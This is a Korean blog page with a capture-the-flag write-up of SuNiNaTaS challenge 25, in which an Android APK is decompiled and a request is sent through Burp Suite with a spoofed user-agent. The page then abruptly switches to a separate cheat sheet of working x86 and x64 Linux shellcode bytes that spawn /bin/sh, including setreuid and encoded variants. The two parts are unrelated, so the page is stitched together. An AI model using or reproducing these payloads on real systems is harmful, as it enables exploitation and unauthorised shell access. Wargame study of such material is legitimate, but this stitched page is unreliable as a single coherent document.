M4ndU의 만두만두한 블로그

SuNiNaTaS의 25번문제 풀이입니다. 

[SYSTEM]

make버튼을 누르면 랜덤으로 4자리 정수가 표시된다.

나는 1925가 나왔다.

zip파일이다.

아 apk파일이다.

이번에도 24번문제와 같이 dex파일을 디컴파일 했다.

jd-gui

이번에도 값을 웹으로 넘긴다.

id, pw, Name, Number가 필요하다.

id와 pw는 suninatas 계정 아이디와 패스워드 일 것이고

Name과 Number만 구하면 되는데 각각 str1, str2변수에 그 값이 담긴다.

Number하니까 생각났는데.. 처음에 나온 LAST NUMBER가 이 Number이지 않을까...

Name은 contacts함수에서 str1이 SuNiNaTaS과 같아야 함을 알 수 있다.

if (str1.equals("SuNiNaTaS"))

url을 완성하고 burp suite를 이용해서 보낼 때 user agent를 안드로이드로 바꿔서 보냈다.

user-agent는 구글링하면 바로 찾을 수 있다.

(앱을 스마트폰에 설치하려고 하면 오류나서 설치할 수가 없다. 오류 수정하느니 user-agent값 바꾸는게 더 빠를듯 싶다.)

클리어

25 Bytes Shell Code

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

26 Bytes Shell Code

\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80

41 Bytes Shell Code

    setreuid(geteuid(), getreuid()) 포함

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

48 Bytes Shell Code

    \x2f가 없는 쉘코드

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

x64

23 Bytes Shell Code

\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05

x64

31 Bytes Shell Code

\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05